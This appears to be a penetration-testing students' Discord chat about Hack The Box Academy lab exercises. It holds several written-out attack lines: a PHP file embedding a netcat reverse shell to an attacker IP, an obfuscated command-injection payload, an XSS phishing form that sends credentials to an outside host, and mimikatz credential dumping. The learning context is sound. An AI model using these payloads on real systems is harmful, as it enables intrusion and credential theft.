Yup woulda been a lot easier to just use CLI instead ngl, unless some sections purely need use of GUI to escalate.

fallow stirrup
#

when migrating to different framework of javascript do you guys start from the scratch and copy the old files back to the new environment?

barren apex
#

AD Enumeration & Attacks - Skills Assessment Part II, anyone able to give me a hint on Q6

zinc thunder
#

Hey! Having some trouble with "advanced command obfuscation" in the command injection module. I'm base64 encoding "find /usr/share/ | grep root | grep mysql | tail -n 1". Getting the ping output but nothing else. When I only encode "find /usr/share/ | grep root | grep mysql |" im getting the expected output. Tried all variants i can think of but not getting the filtered output. This example prints everthing within usr/share: ip=127.0.0.1127.0.0.1%0a$(base64${IFS}-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWw=)%09%<<<%09%24%28r%09"[A-Z]"%09"[a-z]"<<<"tAiL%09%2Dn${IFS}1"%29t any tips?

umbral fulcrum
#

thax, save me alot of time

violet tundra
#

Hello everyone, is it possible to use responder over tunneling ?

#

Or do i need to be in the same network ?

heady tusk
#

I'd assume you need to be on same network. if you can, simply transfer it over (or use Inveigh if it's windows)

fluid kayak
#

hello, can someone help me with the evaluation of sqlmap, I have the flag but it doesn't work

violet tundra
fluid kayak
umbral fulcrum
#

Hi guy
I have a Q regarding module: "Active Directory Enumeration & Attacks" : "Living Off the Land"
I found all the required in the Qs, but in the last Q they want 2 find "disabled account with administrative privileges"
how do I know that those accounts R with administrative privileges??

heady tusk
rich perch
#

hello guys, I'm stuck on the Exploiting Web Vulnerabilities in Thick-Client Applications part of Attacking Common Applications. I did exactly what the module says: changed host file, changed beans.xml to port 1337, deleted all hashes in MANIFEST.MF (there's a newline there), deleted 1.RSA and 1.SF, and updated the binary. However, when I run it I still get "connection error". I don't understand what I'm doing wrong here.

#

hosts file, beans.xml, directory, and MANIFEST.

heady tusk
#

back when I did it, fiddling with the host file would only break it. simply not touching it would do the trick

rich perch
#

oh shoot, I don't remember the original IP. have to reset now

rich perch
sand dirge
low crescent
#

I'm currently doing the Attacking Enterprise networks, and have noticed that of many domain users I have, only one can connect to the specific machine via WinRM protocol (using evil-winrm) - all others return authorization error. I'm trying to understand what determines which users can connect via that protocol? Is there a way to enumerate users that can do that using the Bloodhound?

This is not necessarily a module question, but a more 'broader' one

pulsar needle
#

just kiding my man

heady tusk
low crescent
heady tusk
#

yeah not sure where exactly it was but definitely AD module

low crescent
#

Yup, will look for it in a bit ^^

odd dawn
low crescent
heady tusk
#

ugh okay. well then idk what's going on there

barren apex
#

AD Enumeration & Attacks - Skills Assessment Part II

I have a shell on SQL01 but I cant work out what to do next, I have tried privesc abusing privilges to no succees. any hints?

heady tusk
#

the idea is correct. I believe you have a privilege in sight that you can exploit?

barren apex
heady tusk
#

well there is a lazy way to exploit it if you wanna know

barren apex
#

lol i think the netcat binary got corrupted when i transfered it

#

re-transfered across and it works

heady tusk
#

ugh yeah happens from time to time. always good to compare checksums I guess, even though its tedious

barren apex
#

yep,part of the fun

heady tusk
#

for sure πŸ˜„

quick magnet
#

halo i'm on broken auth skill assesment last step, already change role in cookie, profile text is change but didn't get any flag

vital adder
vital adder
low crescent
vital adder
#

give me a sec i will look up some stuff if i can't find anything i'll shoot you a dm on how to do it but it's going to be better if you have a blog or an article to gone of

hallow kiln
vital adder
#

quick search for that give me 2 module Injection Attacks and Server-side Attacks, haven't Injection Attacks and i'm not 100% recommended Server-side Attacks because the module is kinda old

low crescent
hallow kiln
#

it can be a domain group I think, I just think bloodhound doesn't show that, but it does show stuff like psremoting and I believe also RDP

vital adder
#

don't know if it is just me but the RDP thing work like 20% of the time for me but mostly false negative so a user would have RDP and bloodhound will not show it

hallow kiln
#

bloodhound is kind of hit and miss sometimes

#

still an invaluable tool though

vital adder
hallow kiln
#

gotta love when that happens

low crescent
#

So essentially, it's good to attempt evil-winrm with every single user on every single host that hasn't been owned until I get a hit? πŸ˜…

vital adder
#

if you are stuck yes 🀣

#

there isn't always going to be a clear path to pwning AD if you've run out thing to try and all host that you pwned and have some cred next best thing is to do some spraying

low crescent
#

Yeah, getting to know AD is pretty tough for me, as I come from the web development career and have only been working with Linux for my lifetime, to the point where I'm not strictly comfortable with Windows workstations, not to mention Windows Servers πŸ˜… But oh well, I've recently decided to explore ADs as well which is why I went the CPTS path

#

Still getting familiar with stuff, trying not to blindly follow it without proper understanding

vale crescent
#

Hey would just two days of a week enough to complete Comptia security +??

high reef
#

atleast 3-4 you gotta understand concepts and cyber security logic you may forget stuff

#

unless you have notes you are reviewing everyday

vital adder
vale crescent
#

Okay thanx

quick cairn
#

I am working on windows privilege escalation: pillaging I cannot not figure out the last question Restore the directory containing the files needed to obtain the password hashes for local users. Submit the Administrator hash as the answer , I own the hash but it does not accept it as an answer

rustic sage
#

log rotate section is πŸ’€

hallow kiln
#

no, that's somewhere in my future plans though

#

Hope someone here can give you some feedback on that

zinc marsh
#

I don't think it is worth 1000 cubes

digital pewter
zinc marsh
#

but I don't know how they decide the tier

#

Am talking having done 55 modules

vital adder
#

a module worth it's always going to depend on how much you already know about the module

#

i know a good bit if AD so same as shockp hell nah the powerview module is 1000 cubes is worth but if i'm new to AD and want to learn how this tool work first hand the this could be worth it but it's all depend on what you know

thorn urchin
vital adder
#

oh yea i know that, specifically this has kick me in the ball before when i was doing offshore

vital adder
#

some how it's missed some stuff and i end up stuck for almost a week 🀣 but i mentioned that because the powerview module definitely isn't worth 1000 cubes

#

unfortunately not that long

vital adder
#

dump the rest and you will find the right hash

vital adder
#

sure

#

also if you look at the last of the section for this module you can probably google how to do each of them

rustic sage
#

Yes

trail leaf
#

If evasion is your goal, powershell isn’t the ideal way to go about it

#

It’s just heavily monitored and/or blocked because of how easy/powerful it is to leverage when it’s not being watched

rustic sage
#

Powershell isn't the issue it's just blocking known tools without attempting obfuscation

#

like you can enumerate AD by just importing the .dll for AD module if the box you compromised cannot install rsat (admin privs needed)

#

powershell necessary evil otherwise IT can't do their job

trail leaf
#

I wouldn’t say the tool is blocked myself but now we’re just talking semantics

rustic sage
#

just depends on the environment you're in

thorn urchin
#

abandon powershell, embrace LDAP queries

trail leaf
#

True

rustic sage
thorn urchin
#

dont hate me cause I speak facts

rustic sage
#

ldap queries make me wanna commit rm -rf

thorn urchin
#

even though it wouldnt be useful cause ldapshell is already I thing, I do at some point want to make a utility for converting ldap extra attributes security descriptors into human readable permissions

floral crow
#

I am on the Session Hijacking module where we are to steal the admin cookie via one of the fields vulnerable to XSS on the registration page. . I am receiving the cookie, but the credential is coming back invalid. I have re-tried it 3 times and keep getting the same cookie.

#

nm, i think I know what I did wrong here

#

confirmed, completed

thorn urchin
#

discovering your own solution three seconds after asking someone else a question about it is simultaneously the worst and best

floral crow
zinc marsh
#

I still think u can learn a lot more with the vip in the main app

#

and much cheaper

flat silo
#

I'm on the file upload skills assessment, I've figured out how to read the source code I know the naming scheme, kinda, and I know the directory the feed backs are being uploaded to. If I try to visit the upload directory it get a 404. Can anyone help me understand what I'm missing. I was thinking I'd be able to upload a php shell into the feedback comment section and then navigate to it in the url and be set to cat the flag but I'm not so sure now.

static roost
thorn urchin
#

Havnt done it

#

Ive been told that my basic understanding of ldap already eclipses what that module teaches

floral crow
#

Active directory enumeration & attacks has a little bit of LDAP iirc, it wasn't alot though

thorn urchin
#

read documentation for ldapsearch and ldapmodify

ashen umbra
#

is pwnbox running slow for anyone else today

undone narwhal
flat silo
undone narwhal
flat silo
#

Dude I've been on it for a week and a half I'll look again tomorrow morning thanks

undone narwhal
flat silo
#

Thanks

rustic sage
#

how do i get into a acc with a token?

gloomy bramble
fossil crescent
#

is that a question or a statement?

high reef
#

i'm doing HTB attacking common service hard lab

#

i'm on question Once logged in, what other user can we compromise to gain admin privileges?

#

i rdp using f**** creds

#

went to the users section and in cmd line and none of them are the answer in that directory

#

any tips for me? greatly apprecaited

sly kelp
high reef
#

once i'm in f**** account i just cd to users

thorn urchin
#

you use the lessons taught in the module

high reef
#

is this command correct

#

sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30

trying to estable a connection within my rdp env. this example was provided by HTB

upbeat crane
#

Can anyone just help me with this: Perform a Nmap scan of the target. What is the version of the service from the Nmap scan running on port 8080? . I did nmap with -A -sC and scripts such as banner, http-title-http-enum and burpsuite. I was able to get anything. The hint says a simple version scan but even this is not giving me any feedback

high reef
#

try --disable-arp-ping -Pn and -n

gloomy bramble
lusty thicket
gloomy bramble
graceful mortar
#

i hate thick-client vulns lol

crude compass
#

Is fundamental good

quasi wave
#

if the bug bounty path is all different web application hacking techniques, how is it cumulative?

#

or is it not cumulative?

#

I'm assuming its different from CPTS that way?

warm flame
#

Advanced command injections

quasi wave
#

right but how do I retain all of the information from the CBBH path as I learn it?

#

I want to be able to get certification

#

like CBBH cert

#

and I'm scared of forgetting stuff

#

before its time for me to take test

thorn urchin
#

you take notes

quasi wave
#

ok but even taking notes which I'm doing

#

wouldn't it be difficult to retain skills as you progress in a pathway if you aren't constantly practicing everything you have learned?

#

are there any main platform learning paths that would reinforce everything from CBBH pathway?

#

like OWASP to 10 pathway or other learning paths dedicated to web?

clear hatch
#

Can someone help me out with Assesment 2 Question 8 in the "Active Directory Enumeration & Attacks" Module?

gusty zinc
#

can anyone give me a hand on the final skills assessment for "Web service and API attacks"?

#

I have a working command, have the password, cant reverse the md5 hash.

trail leaf
fathom pendant
#

Enumerate, examine, exploit repeat

acoustic owl
graceful mortar
#

i'm stuck in this exercise:
What is the IP address of the eth0 interface under the ServerStatus -> Ipconfig tab in the fatty-client application?

someone could help me?

clear hatch
clear hatch
#

Administrator. but its from mimikatz# lsadump::lsa /inject on the SQL01 host

tidal mango
#

do you think there might be more hash laying around?

clear hatch
#

yes but not exactly sure how to look at the cached ones. going to reread through the module and see where dumps are happening for accounts that arent local to that machine

#

ive attempted looking for users,groups,hashes coming from MS01 to SQL01 and not finding anything

tidal mango
#

use that advice MarcieLee had above on SQL01

clear hatch
#

?? the enuumerate examine repeat?

#

are you saying to use evil-winrm from SQL01 and not the parrot box?

#

or enumerate for more SQL dbs???

tidal mango
clear hatch
#

or do you want me to go ahead and enumerate users???

#

thats so vague

tidal mango
#

well I dont want to just give it away... your right there, keep looking, so close

clear hatch
tidal mango
#

You'll get it, I know the feeling....

scarlet iris
#

klsit

boreal crest
rustic sage
#

Hello everyone, this is my first time posting on this server, but I encountered a problem in the "Using Web Proxies" module, at the "Burp Intruder" exercise. I managed to find the "index.html" file (using gobuster because it was faster than Intruder), but the file has no flag in it, and I was not able to find another file. Can you please tell me if I did something wrong? Thank you very much!

vital adder
#

on my defense GPT write that dad joke

rustic sage
vital adder
#

from SecLists?

rustic sage
vital adder
#

yea that's the issue

rustic sage
#

Am I doing something wrong? or is it a bug?

vital adder
#

and you did use -x html right?

rustic sage
#

but now I found the flag

#

thanks for the assistance!

short hare
#

I am in Password Attacks Lab: Hard

Can anybody help me with commands to download the file 'Logins.kdbx' file to pwn box?

I keep getting errors..!

heady tusk
heady tusk
short hare
heady tusk
low tusk
#

guys is OSCP enough to get a job?

west night
heady tusk
#

then head over to #welcome and verify your account. make sure you also read #rules

shut wraith
#

CROSS-SITE SCRIPTING (XSS)

Phishing

My command is the exact same as the one taught in the section:

document.write('<h3>Please login to continue</h3><form action=http://10.10.16.51><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

But for some reason I get this output on the page:

NVM I guess it doesn't matter, the automated login still occurred even though the page didn't hide the image URL element

vital adder
#

also you can change the broken icon into something like the bloodhound dog icon for tool but that's just for fun

leaden girder
#

Hey Guys!

I've got this problem that I just can't figure out...
I'm in the Nibbler blog post at privalige escalation and I'm stuck at the LinEnum.

Everytime, in any way that I'm trying to get a 404 File not Found. I've tried it in the normal way and another way what a blog post toild me to go to /dev/shm. But both give me the same error.
Anyone who can tell me what I'm missing?

lusty thicket
vital adder
leaden girder
# vital adder plut0x00 mean has you download LinEnum to your machine if yes then are you runni...

I'm starting to believe that I truly don't understand the assignment πŸ˜…
It is at privalige escalation. It says that if I wget this file then I'll get my root access to get the flag.

The instruction is this: Back on the target type wget http://<your ip>:8080/LinEnum.sh to download the script. If successful, we will see a 200 success response on our Python HTTP server. Once the script is pulled over, type chmod +x LinEnum.sh to make the script executable and then type ./LinEnum.sh to run it. We see a ton of interesting output but what immediately catches the eye are sudo privileges.

But I'm getting a 404 file not found

vital adder
#

what the section show is you can host that file using python http server on your machine and download on the target machine from your

#

but the issue here is you need to download the script on to your machine first

leaden girder
#

yes indeed

vital adder
#

so the question still is: are you running your python http server in the same directory as the script?

leaden girder
#

Do you mean the php exploit script?

vital adder
#

nope the LinEnum script

leaden girder
#

As far as I understood it, I had to run the sudo python script from my HTB virtual machine. Then I had to do th wget script from the target server. Am I wrong there?

#

That's also wat kinda made sense to my basic knowledge

vital adder
leaden girder
#

So what you are saying is that I have to look up where the file is on the target directory and run the wget from there?

vital adder
#

:))

vital adder
leaden girder
#

I'm so utterly confused πŸ˜‚ but thank you for trying, I really apreciate it

lusty thicket
#

before you access it from the nibbles machine

leaden girder
#

Ok, I think I know what you mean (might also be that Dutch is my first language)

low tusk
#

you have to close the img url tag, then proceed with the script

vital adder
#

his problem is the site after the payload doesn't look like the example but everything else is working fine 🀣

heady tusk
#

Someone able to give me a hint for Windows PrivEsc module, section Credential Hunting? I'm stuck on the first question. I found multiple passwords but none of them seem to be correct. I must be missing something

low tusk
#

so the xss payload should be like "> or '> and then proceed with the payload

#

and he should probably try slapping <script> and </script> tags around the payload because the second script which removes the img url form seems to be rendered as plain text

vital adder
#

oh not that part is on on purpose

#

that's what the section show

#

it's just that the last document.getElementById('urlform').remove(); bit is supposed to to remove some UI stuff but it doesn't work i found a "fix" for this a while back

low tusk
#

and then commented out the remaining '> with html comment <!--

vital adder
vital adder
leaden girder
#

@lusty thicket sorry to bother you once more. So I've put the directory of the sudo python3 script on the Desktop path where also my php script is that I uploaded to the server.
But now that I typed it out, this might have been a dumb idea?
I'm completely lost to be honest, it still doesn't work...

low tusk
vital adder
heady tusk
lusty thicket
heady tusk
#

thanks tho

umbral hearth
#

Could anyone help me with the Exploiting Web Vulnerabilities in Thick-Client Applications section of the Attacking Common Applications module? πŸ™‚

heady tusk
long jetty
#

I have a question do y'all take note from module ? And do you use a specific app to take note or just a paper ?

heady tusk
#

taking notes is very important. I believe the most widespread app used is Obsidian. However there are others in use too, e.g. CherryTree and Notion

long jetty
#

Thanks you sir i'll try to take some note

heady tusk
#

what helps me keep good notes is one simple question I ask myself: Given the notes I have, would I be able to help someone else debug their problems with this section?

long jetty
heady tusk
gloomy bramble
vital adder
#

for the love of god if you are going to migrate your note to a different platform do it now before you have too much note 🀣

heady tusk
#

agreed πŸ˜‚

vital adder
#

i've 467 txt note file for the academy 🀣

#

i'm going to transfer and re-do all of it to obsidian in 2077 πŸ˜‚

heady tusk
#

oh god good luck with that lol

#

I'm definitely in the hundreds with my markdown files too but I'm pretty sure Obsidian has to have some kind of import functionality. If not, well then I'm f'ed

long jetty
#

Thanksfully I asked the question I only did 3 module prayge

vital adder
heady tusk
#

well that's kinda true but by now I've helped so many people and always improved my notes when doing so. They're not perfect, but good enough for the most part

hallow kiln
#

You just copy your markdown files into your Obsidian vault folder and you're good to go

small steppe
#

Module: ATTACKING COMMON SERVICES
Section: Attacking DNS
Question: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

Okay. I actually already have the flag for this question but I need someone to explain to me why subbrute is the only tool that was able to identify the appropriate subdomains. I tried a handful of other tools (DNSEnum, DNSRecon, and a one-liner loop with a DNS subdomain wordlist but none of them came up with usable results.

For the one-liner, the wordlist DID have the question's correct subdomain name in it. I even went as far as to create a test.txt file containing ONLY the correct subdomain and it still didn't work. It did, however, return a handful of other subdomains for inlanefreight.htb. Trying to figure what the gap here is. Any ideas?

Edit: The one-liner in question: || for sub in $(cat /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.83.105 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done ||

heady tusk
rustic sage
#

Anyone that can help me with Upload Exploitation in File upload attacks? Should be a pretty straight forward reverse shell, but doesn't work for some reason.

I've tried several reverse shells, most recently the msfvenom and pentestmonkey. Tried several ports and am using tun0 as the ip on the attackbox. Any methodology to know if the problem is the script or the port?

vital adder
#

nope you can't get a shell for any target in that module if i remember correctly

#

all target that have public ip is a docker container and are intended for you to only access the given port to exploit some stuff and get the flag not a shell

rustic sage
#

oh

heady tusk
vital adder
#

oh yea i guess somemthing like a php bash shell would work but you already have RCE though

lusty thicket
rustic sage
#

Yup, you're right. Thanks a lot:)

shut wraith
#

Another day another learning

heady tusk
#

awesome πŸ™‚

digital pewter
shut wraith
grizzled cobalt
#

I'm getting a weird error with the pwnbox vm. Every time I try to open it in a new window/tab, that new window/tab goes blank after a few seconds and I'm no longer able to interact with the pwnbox instance. Not sure how to go about fixing it.

vital adder
#

try refresh that page

grizzled cobalt
#

I've done that. It pops back up with the pwnbox vm visible for a few seconds and then the whole thing blanks again.

mint linden
#

Hi All. I have come across something a little strange. I am working through the CBBH Cert > Using Web Proxies > ZAP Fuzzer page. But when I am running through the question I should be getting a 200 response on the skills directory to get the cookie. But instead getting a 301 Moved Permanently response code. Can someone tell me if this is correct??

graceful mortar
mint linden
graceful mortar
#

you need fuzz the cookie with md5 hash processor

low tusk
vague dragon
#

hello there, I have 2 questions about command injection module, is there someone who can explain?

lethal atlas
#

I use Cherrytree but obsidian is nice. I just dont want to pay for it.

vital adder
#

yo, long time no see also the obsidian is free but you can pay for the Sync thing if you want

vague dragon
#

ok, I see, this will be hard.. guys're talkin' about text editors

full storm
#

heyo

#

i just joined

#

who can help

sick fable
#

sql injection fundamentals, last page where you have to try yourself a machine. i didn't have problems but the hint said something like "check in which directory you have write permission". i found out that the user was able to write in "dashboard" directory randomly after some tests. there was a way for finding it out from sql or it is just common sense? thank you!

raven locust
#

spent nearly an hour stuck on a payload & shells question

#

turns out i just forgot to set a metasploit option and overlooked it continuously

#

wouldve been done in 5 minutes otherwise

#

im gonna jump off a building

sly kelp
raven locust
#

maddening

#

but at least i figured it out myself

sly kelp
#

That's is good

#

Crazy stuff happens in Password Attacks module

#

You need power from whole anime universe to finish that

raven locust
#

lmfao

#

nearly there so we'll see how that goes

sly kelp
#

Good luck Samurai 🀣🀣

heady tusk
heady tusk
lost barn
#

hello

jaunty vigil
#

anyone know why in the skill assessment 2 for deserialization attacks both these buttons are redirecting to local host: ****

echo roost
#

I was able to get the hash using the smbserver method. I've used it before. I want to make sure I have more than one resource for this though.

jaunty vigil
#

use sudo

#

do netstat -utnlp make sure 389 isn't already listening

echo roost
#

same error

#

I checked netstat -tulpn and that port 389 isn't being used

#

Oh duh I had to make the connection back to my machin to get the hash lol -

#

nm they both work. Still get that error though

harsh basin
#

hello

#

i wana learn hacking

#

whats the first thing i do

echo roost
#

cool story bro

lusty thicket
harsh basin
#

who can teach me?

echo roost
#

htb academy

harsh basin
#

youtube?

#

nahhh

#

they teach how to get ur money away with indians

lusty thicket
small steppe
#

Module: ATTACKING COMMON SERVICES
Section: Attacking Email Services
Question: Access the email account using the user credentials that you discovered and submit the flag in the email as your answer.

I was able to bruteforce the username:password but I'm unable to login using those credentials.

|| When I try to use pop3 or imap, I get the following error (respectively):

telnet 10.129.203.12 110
Trying 10.129.203.12...
Connected to 10.129.203.12.
Escape character is '^]'.
+OK POP3
USER <username>
+OK Send your password
PASS <password>
-ERR Invalid user name or password. Please use full email address as user name. ||

A nudge would helpful.

Edit: Corrected the Section Name.

harsh basin
#

what is this

harsh basin
#

if yeah that joke is old

thorn urchin
#

yes

harsh basin
#

and cringe

#

dms plz

thorn urchin
#

read #welcome to verify your account to access the rest of the server

lusty thicket
thorn urchin
#

this isnt the place to beg or ask for DMs

#

this is module discussion only

fathom pendant
#

Most of us have learned from the 2010 Walmart mic YouTube Indians

echo roost
#

this is true

echo roost
raven locust
#

bro is asking how to hack in the #modules channel of htb lmao

#

how do u get here and still have that question

untold knot
#

Module: Getting Started
I have similar problems as Bricktrooper had #modules message
But the solution from Deleted User
#modules message
didn't helped me.

I try to upload the file image.php
<?php system('id'); ?>
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.169 9443 >/tmp/f"); ?>

But the upload does not work. I tried to reset the server. Downloaded a new vpn connection file. But always with the same results.
After the upload of my file, there is a tcp window update, and after that only retransmissions in Wireshark.
Please help me.

gloomy bramble
#

@small steppe IIRC, you might find an 'Evolution'ary way and mess with the settings that seem feasible to you get it.

lusty thicket
untold knot
#

thx for the fast reply. i will try it. have to restart the target...

lusty thicket
untold knot
#

Sorry, this is not the solution for me. The problem is the upload. When i click on save changes, it is loading and loading. But with no result. Any other suggestions?

sick fable
#

somebody would like to suggest me one module (tier 0)? i just completed sql injection and that was pretty fun. (i have 40 cubes)

untold knot
gloomy bramble
#

@jocdelade curl the path to see if you get a response.

lusty thicket
untold knot
# lusty thicket i don’t understand

When I try to upload the file. The page is loading. And when I try to find the image.php on the path, there is no image. And when I monitor the packet exchange, there are only retransmissions.

untold knot
lusty thicket
untold knot
heady tusk
#

I don't have notes on it, so will take me a bit to go through it again. tho if you're still stuck I'll happily do that

rotund sphinx
#

i feel like ive done something wrong on the password attacks -> password mutations, hydra has been going for 90 mins and not got the password yet

heady tusk
#

yeah it should be much quicker than that

untold knot
rotund sphinx
#

ok ty for the tips,

#

i feel stupid now that i didnt check what other ports were open, the question said ssh so i just went straight to ssh bruteforce not even ran nmap 😦

rotund sphinx
#

really need to get in habit of running nmap on every ip i see

#

ye i expected it to take a little while but maybe like 10 mins or something, i didnt think they would really want me hammering it for hours (even if a real target may take that long)

#

ill try cutting out the short passwords + switching which service i hit

fathom pendant
#

I wouldn't recommend the shorter than 10 rule

#

Yeah it does, I just don't recommend it :p

heady tusk
#

alright got the second question done. feel free to share what you did and I can offer guidance

#

well I did it before so it's not as hard anymore πŸ˜‰

#

reread the second question. you already have everything set up correctly for access, just gotta access the right share

#

\\DC01.inlanefreight.htb\john

fathom pendant
#

\\DC01.inlanefreight.htb\john

heady tusk
fathom pendant
#

Ye

heady tusk
#

also nice to see the same people still hanging around here even after I was gone for like 2 months πŸ˜„

#

dir \\DC01.inlanefreight.htb\john is all you need. no $ though

leaden pond
#

I'm working on Password Attacks Lab Hard. So far, I have cracked johanna's password and used that to retrieve an encrypted file from the target. I transferred that file back to my attack machine and used keepass2john to crack it. I get a password for (I think) the user David. Now I'm trying to enumerate SMB shares using crackmapexec using David's credentials, but I get an authentication failure.

heady tusk
sly kelp
#

Did not I tell you this yesterday πŸ₯²πŸ₯²

#

On first try with type

heady tusk
#

c$ is a special share that translates to C:
You were looking for a share called "john", not called "john$". that's why it didn't find it

leaden pond
sly kelp
#

So now module is finished

#

Where is celebration party πŸŽ‰πŸŽ‰

heady tusk
#

well what you did is totally viable. if it works it works 🀷

sly kelp
#

Ohhh I thought you already did that

#

Easier

#

You don't have to deal with PTH stuff

#

Good luck

heady tusk
#

yeah the skill assessments are doable. if you run into any issues feel free to hit me up, I'll likely be around

mild cypress
heady tusk
mild cypress
heady tusk
#

no problem πŸ™‚

flint chasm
#

Hello
Can someone help me with java programming in dm?

#

one ez thing, please

flint chasm
#

I don't have an access to it

heady tusk
leaden pond
#

Still working on password attacks lab hard. I was able to get David's password and retrieve a .vhd file. I used John to get the decryption password for this drive. I then used smbserver to transfer the .vhd file over to johanna's Windows machine. If I double click on the virtual drive on the Windows machine, I'm asked for an Administrator password, which I don't have.

heady tusk
#

you may not mount vhds without administrative privileges I believe. so either you have a windows on hand to mount it on, or you need to mount it on linux. both are possible, the latter is a bit more annoying

silent shoal
#

anyone needs the a

#

earth anmation command il send it to them

leaden pond
#

Got it. So it sounds like I need to create a Windows VM of my own to transfer the virtual drive to and then mount it over there. Thanks!

silent shoal
#

hello

lofty wave
#

Lmao this is more of a reeee statement. SQLMap course. Ohhhhh no information is of use in information_schema. Then proceeds to have to look for a flag in that DB πŸ˜‚

flint chasm
#

could you please help me with Exploiting Web Vulnerabilities in Thick-Client Applications?
I'm not sure why last code is not working

flint chasm
#

no help needed, got it

high reef
leaden yew
#

For Pass the Ticket (PtT) from Linux, I'm trying to use proxychains and impacket-wmiexec/evil-winrm, but It keeps wanting to route to 4.2.2.2:

└──╼ $proxychains impacket-wmiexec dc01 -k
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

|DNS-request| dc01 
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<--timeout

I have /etc/hosts updated, /etc/proxychains.conf is updated and chisel is connected between my attack host and MS01.

Any ideas?

leaden yew
echo roost
#

It's easy just worded in a way where you think you need to run crazy complex commands. Here is a hint: look at the cheat sheet and swap out the database name in the mssql command for the flagDB database.

abstract nova
#

I've seen this question asked multiple times so I'm not the only one not getting this -- In the Meterpreter Tunneling & Port Forwarding module: "Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)" Any help?

patent niche
#

Can someone give me a insight from the module INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC Skill Assessment question 2?

abstract nova
tidal mango
burnt seal
#

Currently doing the Password Attacks module - Protected Files.
Question " Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer."

We aren't provided the password of the Kira user within the material which is what I take the above as meaning. Do I need to crack the password and for brevities sake do I bruteforce using the provided list for the module with mutations or use rockyou like the example

#

Wait found the answer via search. Thanks regardless

novel zephyr
#

please guys I'm having an issue with network enumeration with Nmap module easy lab question i scanned my target host and got the operating system as linux but when i typed the answer, it keeps giving me a wrong ans notification I'm already stranded at that spot.

#

i need help anyone plsπŸ₯Ί

short hare
short hare
tidal mango
short hare
thorn urchin
novel zephyr
short hare
#

nmap -sC -sV -Pn <ip>

novel zephyr
# thorn urchin It wants a more specific answer

Please I've thought about a lot of answers and tried multiple ans like the service version but to no avail since I already know the scope, please can you be more specific with the format of the ans that I should use I'm crying and I'm running out of data bundles 😫

thorn urchin
#

Its not an issue of format

novel zephyr
thorn urchin
#

It wants the operating system. Your answer of linux isnt wrong, but its not specific enough.

lusty thicket
novel zephyr
lusty thicket
short hare
#

I am stuck on Password Attacks Lab - Hard
Can anyone tell me where I can find the password to access the david share?
Nothing seems to work...!

tidal mango
novel zephyr
#

i think i can't add images here oops

tidal mango
short hare
tidal mango
#

no, another application on the machine

short hare
#

ChromeSetup.exe
KeePass-2.50-Setup.exe
lazagne.exe
616960 pd64.exe
pypykatz.ex

Among these?

tidal mango
#

which one of those, that is already installed on the machine, might have passwords in it?

short hare
#

Really..
Upon running all these i really get no output
Just a cmd opens and quickly close automatically, not even see what the output

tidal mango
#

Are you RDP into the machine?

short hare
#

done both rdp and evilwrrm...

lazagne.exe say so passwords
KeePass ask for administrator password which I don't have
And the rest gives nothing

tidal mango
#

sounds like you need a password still to access the app

short hare
#

can I DM you?

tidal mango
#

sure

novel zephyr
tidal kelp
#

to module ACTIVE DIRECTORY ENUMERATION & ATTACKS
section: Kerberoasting - from Windows
When using Mimikatz to extract TGS Kerberos, we got this

   * Saved to file     : 2-40a10000-htb-student@MSSQLSvc~DEV-PRE-SQL.inlanefreight.local~1433-INLANEFREIGHT.LOCAL.kirbi

How can we find this kirbi file? I tried find this local but failed. Thanks in advance

lusty thicket